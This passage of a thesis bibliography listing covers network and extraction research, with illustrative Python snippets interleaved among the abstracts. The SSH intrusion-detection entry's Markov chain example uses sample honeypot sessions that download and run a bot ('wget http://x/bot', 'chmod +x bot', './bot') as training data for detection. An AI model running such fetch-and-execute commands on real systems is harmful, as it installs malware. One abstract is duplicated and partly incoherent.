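    labels = model.predict(pixels)                      # +1 = road-like, -1 = other
    return labels.reshape(rows, cols) == 1

# Example with random data standing in for an image and training spectra.
rng = np.random.default_rng(0)
image = rng.random((8, 64, 64))
train = rng.random((200, 8))
road_mask = classify_road_pixels(image, train)
print("road pixels:", int(road_mask.sum()))
```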
APA, Harvard, Vancouver, ISO, and other styles
20

Karmanska, Anna. "Environmental Assessment of Ukraine Emerald Network Objects in the Uranium Extraction Area." Thesis, National Aviation University, 2020. https://er.nau.edu.ua/handle/NAU/49667.

Full text
Abstract:
This work is published in accordance with the Rector's order No. 008/od of 21.01.2020, "On checking qualification works for academic plagiarism in the 2019-2020 academic year." Project supervisor: Associate Professor, Candidate of Geological and Mineralogical Sciences Tamara Viktorivna Dudar.
Object of research: environmental assessment of Natural Preserve Fund objects within the uranium mining area. Subject of research: the Natural Preserve Fund objects in the vicinity of the uranium mining area. Aim of research: natural substances within the internal antigenic load, as well as exposed elements of the Emerald Network. Methods of research: the references to the creation of Emerald Network projects in the regions of Ukraine are very relevant today, using analytical and scientific work within the framework of a strong supervisory body and its work on natural resources. Analysis of the creation of the Emerald Network facilities will help to evaluate the stations that require the Council of Europe to approximate the legislation of Ukraine, which seeks to implement the Berne Convention and its necessary recommendations.
APA, Harvard, Vancouver, ISO, and other styles
21

Karmanska, Anna. "Environmental Assessment of Ukraine Emerald Network Objects in the Uranium Extraction Area." Thesis, National Aviation University, 2020. http://er.nau.edu.ua/handle/NAU/41531.

Full text
Abstract:
This work is published in accordance with the Rector's order No. 008/od of 21.01.2020, "On checking qualification works for academic plagiarism in the 2019-2020 academic year." Project supervisor: Associate Professor, Candidate of Geological and Mineralogical Sciences Tamara Viktorivna Dudar.
Object of research: environmental assessment of Natural Preserve Fund objects within the uranium mining area. Subject of research: the Natural Preserve Fund objects in the vicinity of the uranium mining area. Aim of research: natural substances within the internal antigenic load, as well as exposed elements of the Emerald Network. Methods of research: the references to the creation of Emerald Network projects in the regions of Ukraine are very relevant today, using analytical and scientific work within the framework of a strong supervisory body and its work on natural resources. Analysis of the creation of the Emerald Network facilities will help to evaluate the stations that require the Council of Europe to approximate the legislation of Ukraine, which seeks to implement the Berne Convention and its necessary recommendations.
APA, Harvard, Vancouver, ISO, and other styles
22

Ghanem, Amer G. "Identifying Patterns of Epistemic Organization through Network-Based Analysis of Text Corpora." University of Cincinnati / OhioLINK, 2015. http://rave.ohiolink.edu/etdc/view?acc_num=ucin1448274706.

Full text
APA, Harvard, Vancouver, ISO, and other styles
23

Glinos, Demetrios. "SYNTAX-BASED CONCEPT EXTRACTION FOR QUESTION ANSWERING." Doctoral diss., University of Central Florida, 2006. http://digital.library.ucf.edu/cdm/ref/collection/ETD/id/3565.

Full text
Abstract:
Question answering (QA) stands squarely along the path from document retrieval to text understanding. As an area of research interest, it serves as a proving ground where strategies for document processing, knowledge representation, question analysis, and answer extraction may be evaluated in real world information extraction contexts. The task is to go beyond the representation of text documents as "bags of words" or data blobs that can be scanned for keyword combinations and word collocations in the manner of internet search engines. Instead, the goal is to recognize and extract the semantic content of the text, and to organize it in a manner that supports reasoning about the concepts represented. The issue presented is how to obtain and query such a structure without either a predefined set of concepts or a predefined set of relationships among concepts. This research investigates a means for acquiring from text documents both the underlying concepts and their interrelationships. Specifically, a syntax-based formalism for representing atomic propositions that are extracted from text documents is presented, together with a method for constructing a network of concept nodes for indexing such logical forms based on the discourse entities they contain. It is shown that meaningful questions can be decomposed into Boolean combinations of question patterns using the same formalism, with free variables representing the desired answers. It is further shown that this formalism can be used for robust question answering using the concept network and WordNet synonym, hypernym, hyponym, and antonym relationships. This formalism was implemented in the Semantic Extractor (SEMEX) research tool and was tested against the factoid questions from the 2005 Text Retrieval Conference (TREC), which operated upon the AQUAINT corpus of newswire documents. After adjusting for the limitations of the tool and the document set, correct answers were found for approximately fifty percent of the questions analyzed, which compares favorably with other question answering systems.
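A small, hedged example of the WordNet relationships the abstract mentions, using NLTK's WordNet interface to collect synonyms, hypernyms, hyponyms and antonyms for a term; how SEMEX actually indexes and matches concepts is not shown here.

```python
# Requires: pip install nltk, then nltk.download("wordnet") once.
from nltk.corpus import wordnet as wn

def related_terms(word):
    """Collect lemma names reachable through the four WordNet relations."""
    related = {"synonyms": set(), "hypernyms": set(),
               "hyponyms": set(), "antonyms": set()}
    for syn in wn.synsets(word):
        for lemma in syn.lemmas():
            related["synonyms"].add(lemma.name())
            related["antonyms"].update(a.name() for a in lemma.antonyms())
        for hyper in syn.hypernyms():
            related["hypernyms"].update(l.name() for l in hyper.lemmas())
        for hypo in syn.hyponyms():
            related["hyponyms"].update(l.name() for l in hypo.lemmas())
    return related

print(related_terms("vehicle")["hyponyms"])
```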
Ph.D.
School of Computer Science
Engineering and Computer Science
Computer Science
APA, Harvard, Vancouver, ISO, and other styles
24

Li, Hui [Verfasser], and Michael [Akademischer Betreuer] Gertz. "Social Network Extraction and Exploration of Historic Correspondences / Hui Li ; Betreuer: Michael Gertz." Heidelberg : Universitätsbibliothek Heidelberg, 2018. http://d-nb.info/117738454X/34.

Full text
APA, Harvard, Vancouver, ISO, and other styles
25

Serra, Torrens Jordi. "Completion time minimization for distributed feature extraction in a visual sensor network testbed." Thesis, KTH, Kommunikationsnät, 2014. http://urn.kb.se/resolve?urn=urn:nbn:se:kth:diva-156883.

Full text
Abstract:
Real-time detection and extraction of visual features in wireless sensor networks is a challenging task due to its computational complexity and the limited processing power of the nodes. A promising approach is to distribute the workload to other nodes of the network by delegating the processing of different regions of the image to different nodes. In this work a solution that optimally schedules the loads assigned to each node is implemented on a real visual sensor network testbed. To minimize the time required to process an image, the sizes of the subareas assigned to the cooperators are calculated by solving a linear programming problem that takes into account the transmission and processing speed of the nodes and the spatial distribution of the visual features. In order to minimize the global workload, an optimal detection threshold is predicted such that only the most significant features are extracted. The solution is implemented on a visual sensor network testbed consisting of BeagleBone Black computers capable of communicating over IEEE 802.11. The capabilities of the testbed are also extended by adapting a reliable UDP-based transmission protocol capable of multicast transmission. The performance of the implemented algorithms is evaluated on the testbed.
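A hedged sketch of the completion-time-minimization step described above: if node i receives a fraction x_i of the image and needs c_i seconds per unit of area (transmission plus processing), minimizing the makespan T can be posed as a small linear program. The cost model is deliberately simplified and the numbers are made up; the thesis's formulation also accounts for the spatial distribution of features.

```python
import numpy as np
from scipy.optimize import linprog

# Per-node cost (seconds per unit of image area), combining transmit + process.
c = np.array([0.8, 1.2, 1.0, 2.0])
n = len(c)

# Variables: [x_1 ... x_n, T].  Minimize T.
objective = np.r_[np.zeros(n), 1.0]

# c_i * x_i - T <= 0 for every node (no node finishes later than T).
A_ub = np.hstack([np.diag(c), -np.ones((n, 1))])
b_ub = np.zeros(n)

# x_1 + ... + x_n = 1 (the whole image is assigned).
A_eq = np.r_[np.ones(n), 0.0].reshape(1, -1)
b_eq = [1.0]

res = linprog(objective, A_ub=A_ub, b_ub=b_ub, A_eq=A_eq, b_eq=b_eq,
              bounds=[(0, None)] * (n + 1), method="highs")
x, T = res.x[:n], res.x[-1]
print("area shares:", np.round(x, 3), "completion time:", round(T, 3))
```

As expected, the optimal shares come out inversely proportional to the per-node costs, so every cooperator finishes at the same time T.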
APA, Harvard, Vancouver, ISO, and other styles
26

Sanchez, Monica A. "Doppler Extraction for a Demand Assignment Multiple Access Service for NASA's Space Network." International Foundation for Telemetering, 1996. http://hdl.handle.net/10150/611433.

Full text
Abstract:
International Telemetering Conference Proceedings / October 28-31, 1996 / Town and Country Hotel and Convention Center, San Diego, California
NASA's Space Network (SN) provides both single access (SA) and multiple access (MA) services through a pre-scheduling system. Currently, a user's spacecraft cannot receive service unless prior scheduling has occurred with the control center. NASA is interested in efficiently utilizing the time between scheduled services. Thus, a demand assignment multiple access (DAMA) service study was conducted to provide a solution. The DAMA service would allow the user's spacecraft to initiate a service request; the control center could then schedule the next available time slot upon owner approval. In this paper, the basic DAMA service request design and integration is presented.
APA, Harvard, Vancouver, ISO, and other styles
27

Halling, Leonard. "Feature Extraction for Content-Based Image Retrieval Using a Pre-Trained Deep Convolutional Neural Network." Thesis, KTH, Skolan för elektroteknik och datavetenskap (EECS), 2020. http://urn.kb.se/resolve?urn=urn:nbn:se:kth:diva-274340.

Full text
Abstract:
This thesis examines the performance of features extracted from a pre-trained deep convolutional neural network for content-based image retrieval in images from news articles. The industry constantly awaits improved methods for image retrieval, including the company hosting this research project, which is looking to improve its existing image-description-based method for image retrieval. It has been shown that, in a neural network, the activations invoked by an image can be used as a high-level representation (feature) of the image. This study explores the efficiency of these features in an image similarity setting. An experiment is performed that evaluates the performance through a comparison with the answers in an image similarity survey containing solutions made by humans. The new model scores 72.5% on the survey and outperforms the existing image-description-based method, which only achieved a score of 37.5%. Discussions of the results, design choices, and suggestions for further improvements of the implementation are presented in the later parts of the thesis.
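A minimal sketch, assuming PyTorch/torchvision, of the kind of feature extractor the thesis evaluates: take a pre-trained CNN, drop its classification head, and compare images by cosine similarity of the resulting feature vectors. The backbone, weights and preprocessing are illustrative choices, not necessarily those used in the thesis.

```python
import torch
import torch.nn.functional as F
from torchvision import models, transforms
from PIL import Image

# Pre-trained backbone with the final classification layer removed
# (torchvision >= 0.13; older versions use pretrained=True instead of weights=).
backbone = models.resnet50(weights="IMAGENET1K_V1")
extractor = torch.nn.Sequential(*list(backbone.children())[:-1]).eval()

preprocess = transforms.Compose([
    transforms.Resize(256),
    transforms.CenterCrop(224),
    transforms.ToTensor(),
    transforms.Normalize(mean=[0.485, 0.456, 0.406],
                         std=[0.229, 0.224, 0.225]),
])

@torch.no_grad()
def feature(path: str) -> torch.Tensor:
    x = preprocess(Image.open(path).convert("RGB")).unsqueeze(0)
    return extractor(x).flatten(1)          # shape (1, 2048)

def similarity(path_a: str, path_b: str) -> float:
    return float(F.cosine_similarity(feature(path_a), feature(path_b)))
```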
APA, Harvard, Vancouver, ISO, and other styles
28

Mamidanna, Pranav. "Optimizing Neural Source Extraction Algorithms: A Performance Measure Based on Neuronal Network Properties." Thesis, KTH, Numerisk analys, NA, 2017. http://urn.kb.se/resolve?urn=urn:nbn:se:kth:diva-210052.

Full text
Abstract:
Extracting neural activity from electrophysiological and calcium imaging measurements is an important problem in neuroscience. All existing automated algorithms for this purpose, however, rely heavily on manual intervention and parameter tuning. In this thesis, we introduce a novel performance measure based on well-founded notions of neuronal network organization. This enables us to systematically tune parameters, using techniques from statistical design of experiments and response surface methods. We implement this framework on an algorithm used to extract neural activity from microendoscopic calcium imaging datasets, and demonstrate that this greatly reduces manual intervention.
APA, Harvard, Vancouver, ISO, and other styles
29

Choi, Hyunjong. "Medical Image Registration Using Artificial Neural Network." DigitalCommons@CalPoly, 2015. https://digitalcommons.calpoly.edu/theses/1523.

Full text
Abstract:
Image registration is the transformation of different sets of images into one coordinate system in order to align and overlay multiple images. Image registration is used in many fields such as medical imaging, remote sensing, and computer vision. It is very important in medical research, where multiple images are acquired from different sensors at various points in time. This allows doctors to monitor the effects of treatments on patients in a certain region of interest over time. In this thesis, artificial neural networks with curvelet keypoints are used to estimate the parameters of registration. Simulations show that the curvelet keypoints provide more accurate results than using the Discrete Cosine Transform (DCT) coefficients and Scale Invariant Feature Transform (SIFT) keypoints on rotation and scale parameter estimation.
APA, Harvard, Vancouver, ISO, and other styles
30

Trigueiros, Duarte. "Neural network based methods in the extraction of knowledge from accounting and financial data." Thesis, University of East Anglia, 1991. http://ethos.bl.uk/OrderDetails.do?uin=uk.bl.ethos.292217.

Full text
APA, Harvard, Vancouver, ISO, and other styles
31

Zaman, Tauhid R. "Information extraction with network centralities : finding rumor sources, measuring influence, and learning community structure." Thesis, Massachusetts Institute of Technology, 2011. http://hdl.handle.net/1721.1/70410.

Full text
Abstract:
Thesis (Ph. D.)--Massachusetts Institute of Technology, Dept. of Electrical Engineering and Computer Science, 2011.
Cataloged from PDF version of thesis.
Includes bibliographical references (p. 193-197).
Network centrality is a function that takes a network graph as input and assigns a score to each node. In this thesis, we investigate the potential of network centralities for addressing inference questions arising in the context of large-scale networked data. These questions are particularly challenging because they require algorithms which are extremely fast and simple so as to be scalable, while at the same time they must perform well. It is this tension between scalability and performance that this thesis aims to resolve by using appropriate network centralities. Specifically, we solve three important network inference problems using network centrality: finding rumor sources, measuring influence, and learning community structure. We develop a new network centrality called rumor centrality to find rumor sources in networks. We give a linear time algorithm for calculating rumor centrality, demonstrating its practicality for large networks. Rumor centrality is proven to be an exact maximum likelihood rumor source estimator for random regular graphs (under an appropriate probabilistic rumor spreading model). For a wide class of networks and rumor spreading models, we prove that it is an accurate estimator. To establish the universality of rumor centrality as a source estimator, we utilize techniques from the classical theory of generalized Polya's urns and branching processes. Next we use rumor centrality to measure influence in Twitter. We develop an influence score based on rumor centrality which can be calculated in linear time. To justify the use of rumor centrality as the influence score, we use it to develop a new network growth model called topological network growth. We find that this model accurately reproduces two important features observed empirically in Twitter retweet networks: a power-law degree distribution and a superstar node with very high degree. Using these results, we argue that rumor centrality is correctly quantifying the influence of users on Twitter. These scores form the basis of a dynamic influence tracking engine called Trumor which allows one to measure the influence of users in Twitter or more generally in any networked data. Finally we investigate learning the community structure of a network. Using arguments based on social interactions, we determine that the network centrality known as degree centrality can be used to detect communities. We use this to develop the leader-follower algorithm (LFA) which can learn the overlapping community structure in networks. The LFA runtime is linear in the network size. It is also non-parametric, in the sense that it can learn both the number and size of communities naturally from the network structure without requiring any input parameters. We prove that it is very robust and learns accurate community structure for a broad class of networks. We find that the LFA does a better job of learning community structure on real social and biological networks than more common algorithms such as spectral clustering.
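As a hedged illustration of rumor centrality on a tree-structured infection graph, assuming the tree-network closed form reported in the publications associated with this thesis (R(v) = N! times the product over nodes u of 1/T_u^v, where T_u^v is the size of the subtree rooted at u when the tree is rooted at v), the sketch below computes log rumor centrality for every node of a small tree with networkx. Treat it as an illustration only; consult the thesis for the exact estimator and its extensions to general graphs.

```python
import math
import networkx as nx

def log_rumor_centrality(tree: nx.Graph, v) -> float:
    """log R(v) = log(N!) - sum over nodes u of log(subtree size of u, rooted at v)."""
    rooted = nx.bfs_tree(tree, v)                    # directed tree rooted at v
    subtree = {}
    for u in reversed(list(nx.topological_sort(rooted))):
        subtree[u] = 1 + sum(subtree[c] for c in rooted.successors(u))
    n = tree.number_of_nodes()
    return math.lgamma(n + 1) - sum(math.log(s) for s in subtree.values())

# Example: on a small tree, the node with the highest score is the
# maximum-likelihood candidate for the rumor source.
T = nx.Graph([(0, 1), (1, 2), (1, 3), (3, 4), (3, 5)])
scores = {v: log_rumor_centrality(T, v) for v in T}
print(max(scores, key=scores.get), scores)
```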
by Tauhid R. Zaman.
Ph.D.
APA, Harvard, Vancouver, ISO, and other styles
32

Ben, slimen Yosra. "Knowledge extraction from huge volume of heterogeneous data for an automated radio network management." Thesis, Lyon, 2018. http://www.theses.fr/2018LYSE2046.

Full text
Abstract:
In order to help mobile operators with the management of their radio access networks, three models are proposed. The first model is a supervised approach for mobile anomaly prevention. Its objective is to detect future malfunctions of a set of cells by only observing key performance indicators (KPIs), which are treated as functional data. Thus, by alerting the engineers as well as self-organizing networks, mobile operators can be saved from a certain performance degradation. The model has proven its efficiency in an application on real data that aims to detect capacity degradation, accessibility problems and call-drop anomalies in LTE networks. Due to the diversity of mobile network technologies, the volume of data that has to be observed by mobile operators on a daily basis has become enormous. This huge volume has become an obstacle to mobile network management. The second model aims to provide a simplified representation of KPIs for easier analysis. Hence, a model-based co-clustering algorithm for functional data is proposed. The algorithm relies on the latent block model, in which each curve is identified by its functional principal components, which are modeled by a multivariate Gaussian distribution whose parameters are block-specific. These parameters are estimated by a stochastic EM algorithm embedding a Gibbs sampler. This model is the first co-clustering approach for functional data, and it has proven its efficiency on simulated data and in a real data application that helps to optimize the topology of 4G mobile networks. The third model aims to summarize the information contained in KPIs and also in network alarms. A model-based co-clustering algorithm for mixed functional and binary data is therefore proposed. The approach relies on the latent block model, and three algorithms are compared for its inference: stochastic EM within Gibbs sampling, classification EM and variational EM. The proposed model is the first co-clustering algorithm for mixed data that deals with functional and binary features. It has proven its efficiency on simulated data and on real data extracted from live 4G mobile networks.
APA, Harvard, Vancouver, ISO, and other styles
33

Blamey, Benjamin. "Lifelogging with SAESNEG : a system for the automated extraction of social network event groups." Thesis, Cardiff Metropolitan University, 2015. http://hdl.handle.net/10369/7859.

Full text
Abstract:
This thesis presents SAESNEG, a System for the Automated Extraction of Social Network Event Groups; a pipeline for the aggregation of the personal social media footprint and its partitioning into events, the event clustering problem. SAESNEG facilitates a reminiscence-friendly user experience, where the user is able to navigate their social media footprint. A range of socio-technical issues are explored: the challenges to reminiscence, lifelogging, ownership, and digital death. Whilst previous systems have focused on the organisation of a single type of data, such as photos or Tweets, SAESNEG handles the variety of types of social network documents found in a typical footprint (e.g. photos, Tweets, check-ins), with a variety of image, text and other metadata: differently heterogeneous data adapted to the sparse, private events typical of the personal social media footprint. Phase A extracts information, focusing on natural language processing; new techniques are developed, including a novel distributed approach to handling temporal expressions and a parser for social events (such as birthdays). Information is also extracted from image and metadata, the resultant annotations feeding the subsequent event clustering. Phase B performs event clustering through the application of a number of pairwise similarity strategies, a mixture of new and existing algorithms. Clustering itself is achieved by combining machine learning with correlation clustering. The main contributions of this thesis are the identification of the technical research task (and the associated social need), the development of novel algorithms and approaches, and the integration of these with existing algorithms to form the pipeline. Results demonstrate SAESNEG's capability to perform event clustering on a differently heterogeneous dataset, enabling users to achieve lifelogging in the context of their existing social media networks.
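To make the Phase B idea concrete, the sketch below turns pairwise similarity features into same-event probabilities with a classifier and groups documents with a greedy pivot-based correlation clustering. The feature set, the toy documents and the pivot heuristic are illustrative assumptions, not SAESNEG's actual design.

```python
# Sketch of Phase B's general idea under assumed inputs: a classifier turns
# pairwise similarity features into same-event probabilities, and a greedy
# pivot-based correlation clustering groups documents into events.
import random
from itertools import combinations
from sklearn.linear_model import LogisticRegression

def pairwise_features(a, b):
    # Hypothetical similarity features between two social media documents.
    return [
        abs(a["timestamp"] - b["timestamp"]) / 3600.0,        # hours apart
        1.0 if a["location"] == b["location"] else 0.0,       # same check-in
        len(set(a["terms"]) & set(b["terms"])),               # shared terms
    ]

def correlation_cluster(docs, same_event_prob, threshold=0.5, seed=0):
    """Greedy pivot clustering: attach to a random pivot every unassigned
    document the classifier links to it with probability above threshold."""
    rng = random.Random(seed)
    unassigned, clusters = list(range(len(docs))), []
    while unassigned:
        pivot = unassigned.pop(rng.randrange(len(unassigned)))
        cluster = [pivot]
        for j in list(unassigned):
            if same_event_prob(docs[pivot], docs[j]) >= threshold:
                cluster.append(j)
                unassigned.remove(j)
        clusters.append(cluster)
    return clusters

# Toy documents and labels; in practice the classifier would be trained on
# annotated pairs from the user's footprint.
docs = [
    {"timestamp": 0,     "location": "cafe", "terms": ["birthday", "cake"]},
    {"timestamp": 1800,  "location": "cafe", "terms": ["birthday", "friends"]},
    {"timestamp": 90000, "location": "park", "terms": ["run"]},
]
pairs = list(combinations(range(len(docs)), 2))
X = [pairwise_features(docs[i], docs[j]) for i, j in pairs]
y = [1, 0, 0]  # only the first pair belongs to the same event
clf = LogisticRegression().fit(X, y)

def prob(a, b):
    return clf.predict_proba([pairwise_features(a, b)])[0, 1]

print(correlation_cluster(docs, prob))
```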
APA, Harvard, Vancouver, ISO, and other styles
34

Münch, Felix Victor. "Measuring the networked public: Exploring network science methods for large scale online media studies." Thesis, Queensland University of Technology, 2019. https://eprints.qut.edu.au/125543/1/Felix%20M%C3%BCnch%20Thesis.pdf.

Full text
Abstract:
This thesis explores network science methods and media and communication theory to investigate structures and dynamics of national and global publics. It does so in two studies: one regarding the sharing of hashtags and links on Twitter around acute events, such as the Sydney Siege; the other about communities, publics, and possible echo chambers in the Australian Twitter follower network. It leads to new evidence about structures and dynamics within communities and the public sphere on Twitter, revealing the epistemological implications of network analysis algorithms and outlining a methodological framework to better connect media and communication studies with network science.
APA, Harvard, Vancouver, ISO, and other styles
35

Rabadia, Priya Naran. "Extraction of patterns in selected network traffic for a precise and efficient intrusion detection approach." Thesis, Edith Cowan University, Research Online, Perth, Western Australia, 2018. https://ro.ecu.edu.au/theses/2142.

Full text
Abstract:
This thesis investigates a precise and efficient pattern-based intrusion detection approach by extracting patterns from sequential adversarial commands. As organisations place more assets within the cyber domain, mitigating the potential exposure of these assets is becoming increasingly imperative. Machine learning is the application of learning algorithms to extract knowledge from data, determine patterns between data points and make predictions. Machine learning algorithms have been used to extract patterns from sequences of commands to precisely and efficiently detect adversaries using the Secure Shell (SSH) protocol. Since SSH is one of the most predominant methods of accessing systems, it is also a prime target for cyber-criminal activity. For this study, deep packet inspection was applied to data acquired from three medium-interaction honeypots emulating the SSH service. Feature selection was used to enhance the performance of the selected machine learning algorithms. A pre-processing procedure was developed to organise the acquired datasets and present the sequences of adversary commands per unique SSH session. The pre-processing phase also included generating a reduced version of each dataset that evenly and coherently represents the respective full dataset. This study focused on whether the machine learning algorithms can extract more precise patterns, more efficiently, from the reduced sequence-of-commands datasets than from their respective full datasets, since a reduced dataset requires less storage space than the corresponding full dataset. The machine learning algorithms selected for this study were the Naïve Bayes, Markov chain, Apriori and Eclat algorithms. The results show that the algorithms applied to the reduced datasets could extract additional patterns that are more precise than those extracted from the respective full datasets. It was also determined that the Naïve Bayes and Markov chain algorithms are more efficient at processing the reduced datasets than their respective full datasets. The best-performing algorithm was the Markov chain algorithm, extracting more precise patterns efficiently from the reduced datasets. The greatest improvement in processing a reduced dataset was 97.711%. This study contributes to the domain of pattern-based intrusion detection by providing an approach that can precisely and efficiently detect adversaries utilising SSH communications to gain unauthorised access to a system.
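As an illustration of the Markov chain idea applied to command sequences, the sketch below fits a first-order, Laplace-smoothed transition model over per-session SSH commands and scores how typical a new session looks. The command vocabulary, sessions and scoring are made up for the example and are not the thesis's exact procedure.

```python
# Minimal sketch: first-order Markov chain over per-session command sequences,
# with Laplace smoothing, used to score how typical a new session looks.
import math
from collections import defaultdict

def fit_markov_chain(sessions):
    counts = defaultdict(lambda: defaultdict(int))
    vocab = set()
    for commands in sessions:
        seq = ["<start>"] + commands
        vocab.update(seq)
        for prev, cur in zip(seq, seq[1:]):
            counts[prev][cur] += 1
    return counts, vocab

def log_likelihood(commands, counts, vocab):
    """Average log-probability of a session under the chain (Laplace-smoothed)."""
    seq = ["<start>"] + commands
    total = 0.0
    for prev, cur in zip(seq, seq[1:]):
        row = counts.get(prev, {})
        prob = (row.get(cur, 0) + 1) / (sum(row.values()) + len(vocab))
        total += math.log(prob)
    return total / len(commands)

# Hypothetical training sessions observed on a honeypot.
training_sessions = [
    ["uname -a", "wget http://x/bot", "chmod +x bot", "./bot"],
    ["uname -a", "cat /proc/cpuinfo", "wget http://x/bot", "./bot"],
]
counts, vocab = fit_markov_chain(training_sessions)
print(log_likelihood(["uname -a", "wget http://x/bot", "./bot"], counts, vocab))
print(log_likelihood(["ls", "whoami", "exit"], counts, vocab))
```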
APA, Harvard, Vancouver, ISO, and other styles
36

Desai, Urvashi. "Student Interaction Network Analysis on Canvas LMS." Miami University / OhioLINK, 2020. http://rave.ohiolink.edu/etdc/view?acc_num=miami1588339724934746.

Full text
APA, Harvard, Vancouver, ISO, and other styles
37

González, Fernández Ernesto. "Low-power techniques for wireless gas sensing network applications: pulsed light excitation with data extraction strategies." Doctoral thesis, Universitat Rovira i Virgili, 2021. http://hdl.handle.net/10803/672792.

Full text
Abstract:
The present thesis is focused on two different yet related research lines. The first addresses the development of a pulsed-light-based chemiresistive sensor modulation methodology for extracting information from the transient signal. The second deals with the implementation of a LoRa-based portable, scalable, low-cost and low-power Wireless Sensor Network (WSN) for Air Quality Monitoring (AQM) and the detection of gas leakage events. This document is structured in four chapters organised as follows: Chapter 1 presents the state of the art, an introduction to sensing performance enhancement and transient data extraction methods, as well as an introduction to the implementation of WSNs for AQM; Chapter 2 is composed of the two published papers related to the pulsed light modulation methodology for transient information extraction; Chapter 3 presents the published paper related to the implementation of a LoRa-based WSN for AQM; Chapter 4 states the conclusions derived from the results obtained during this thesis project and the recommendations for future work associated with the continuation of its main findings.
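As a simple illustration of transient information extraction, the sketch below fits an exponential model to a sensor's response after a light pulse and reports a time constant and amplitude. The model form, parameter names and synthetic data are assumptions made for the example, not the methodology of the published papers.

```python
# Illustrative sketch: extract simple features (time constant, amplitude) from
# a chemiresistive sensor's transient response to a light pulse by fitting an
# exponential model. Model form and numbers are assumptions for the example.
import numpy as np
from scipy.optimize import curve_fit

def pulse_response(t, r_base, dr, tau):
    """Assumed first-order response of sensor resistance after the pulse onset."""
    return r_base + dr * (1.0 - np.exp(-t / tau))

# Synthetic transient: 5 s of resistance samples at 100 Hz with noise.
t = np.linspace(0.0, 5.0, 500)
rng = np.random.default_rng(1)
r = pulse_response(t, r_base=10e3, dr=2e3, tau=0.8) + rng.normal(0, 30.0, t.size)

popt, _ = curve_fit(pulse_response, t, r, p0=[r[0], r[-1] - r[0], 1.0])
r_base, dr, tau = popt
print(f"baseline={r_base:.0f} ohm, amplitude={dr:.0f} ohm, tau={tau:.2f} s")
# These per-pulse features could then be sent over the WSN instead of the
# full transient, reducing the transmitted data volume.
```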
APA, Harvard, Vancouver, ISO, and other styles
38

Fernandez, Marie. "Extraction et analyse du réseau acoustique d'oiseaux sociaux." Thesis, Lyon, 2018. http://www.theses.fr/2018LYSEI030.

Full text
Abstract:
Bird populations represent a significant proportion of urban and rural biodiversity, and the acquisition of reliable, up-to-date and precise data on bird populations can be central to environmental policy decisions. The classical techniques (banding, tracking, counting) are demanding in human resources and often invasive. Bioacoustics is a non-invasive tool for monitoring animal populations (density, migration paths and so on). Moreover, it has been shown in many species that the study of vocal exchanges can largely help to understand the social interactions occurring within a group. However, studying vocal exchanges can be difficult, especially at a fine scale of interaction, which is why bioacoustics has rarely been used to characterise the social structure of groups. The aim of this project was to develop techniques for extracting individual vocalisations within a group and for modelling their dynamics at a fine scale. After developing, testing and validating our method, we used it to extract the acoustic network of a social bird species, the zebra finch, and to investigate the link between the acoustic and social networks. Across several studies we showed that group composition, in particular its size and the presence of couples or juveniles, shapes parts of the vocal dynamics. We also found that the environmental context (no perturbation, then visual separation of a couple, or predation in the group) can affect the dynamics of vocal interactions. This project thus contributes to both fundamental and applied research: to fundamental research, because studying the dynamics of vocal interactions helps to better understand the social network, and to applied research, by helping to define new standards for population monitoring.
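One way to picture the acoustic network extraction step is shown below: from individually attributed, time-stamped calls, a directed edge i to j is weighted by how often j calls within a short window after i. The 0.5 s window and the toy data are illustrative choices, not the thesis's calibrated parameters.

```python
# Sketch of turning individually attributed, time-stamped calls into a
# directed acoustic network of call-response interactions.
from collections import Counter

def acoustic_network(calls, response_window=0.5):
    """calls: list of (time_in_seconds, caller_id), assumed sorted by time."""
    edges = Counter()
    for k, (t_i, caller_i) in enumerate(calls):
        for t_j, caller_j in calls[k + 1:]:
            if t_j - t_i > response_window:
                break                      # later calls are outside the window
            if caller_j != caller_i:
                edges[(caller_i, caller_j)] += 1
    return edges

# Toy recording with three individuals A, B and C.
calls = [(0.00, "A"), (0.30, "B"), (0.35, "A"), (1.20, "C"), (1.45, "A")]
for (src, dst), weight in sorted(acoustic_network(calls).items()):
    print(f"{src} -> {dst}: {weight}")
```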
APA, Harvard, Vancouver, ISO, and other styles
39

Roberts, David James. "Applications of Artificial Neural Networks to Synthetic Aperture Radar for Feature Extraction in Noisy Environments." DigitalCommons@CalPoly, 2013. https://digitalcommons.calpoly.edu/theses/996.

Full text
Abstract:
Images generated from Synthetic Aperture Radar (SAR) are often noisy, distorted, or incomplete pictures of a target or target region. As the goal of most SAR research pertains to automatic target recognition (ATR), extensive filtering and image processing is required in order to extract the features necessary to carry out ATR. This thesis investigates the use of Artificial Neural Networks (ANNs) to improve the feature extraction process by laying the foundation for ANN SAR ATR algorithms and programs. The first technique investigated is an ANN edge detector designed to be invariant to multiplicative speckle noise. The algorithm uses the Back Propagation (BP) algorithm to teach a multi-layer perceptron network to detect edges. To do so, several parameters within a sliding window (SW) are calculated as the inputs to the ANN. The ANN then outputs an edge map that includes the outer edge features of the target as well as some internal edge features. The next technique examined is a pattern recognition and target reconstruction algorithm based on the associative-memory ANN known as the Hopfield Network (HN). For this version of the HN, the network is trained with a collection of varying geometric shapes. The output of the network is a nearest-fit representation of the incomplete image data input. Because of the versatility of this program, it is also able to reconstruct incomplete 3D models determined from SAR data. The final technique investigated is an automatic rotation procedure to detect the change in perspective relative to the platform. This type of detection can prove useful for target tracking or 3D modelling, where the direction vector or relative angle of the target is a desired piece of information.
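The sketch below illustrates the first technique's general idea: per-pixel sliding-window features built from ratios of half-window means (which cancel a common multiplicative gain, so they are robust to speckle) fed into a small multi-layer perceptron trained with back-propagation. The window size, feature set and labels are illustrative assumptions rather than the thesis's exact parameters.

```python
# Sketch: speckle-robust sliding-window features (ratios of half-window means)
# fed to a small MLP trained with back-propagation to flag edge pixels.
import numpy as np
from sklearn.neural_network import MLPClassifier

def window_features(img, row, col, half=2):
    """Ratio-of-averages across the vertical and horizontal splits of a window."""
    win = img[row - half:row + half + 1, col - half:col + half + 1]
    top, bottom = win[:half].mean(), win[half + 1:].mean()
    left, right = win[:, :half].mean(), win[:, half + 1:].mean()
    eps = 1e-9
    return [min(top, bottom) / (max(top, bottom) + eps),
            min(left, right) / (max(left, right) + eps)]

# Synthetic speckled image: two regions of different reflectivity multiplied
# by exponential speckle, with the true edge known for training labels.
rng = np.random.default_rng(0)
reflectivity = np.ones((64, 64))
reflectivity[:, 32:] = 4.0
img = reflectivity * rng.exponential(1.0, size=reflectivity.shape)

half = 2
rows, cols = np.meshgrid(np.arange(half, 64 - half),
                         np.arange(half, 64 - half), indexing="ij")
X = np.array([window_features(img, r, c, half)
              for r, c in zip(rows.ravel(), cols.ravel())])
y = (np.abs(cols.ravel() - 32) <= 1).astype(int)   # pixels near the true edge
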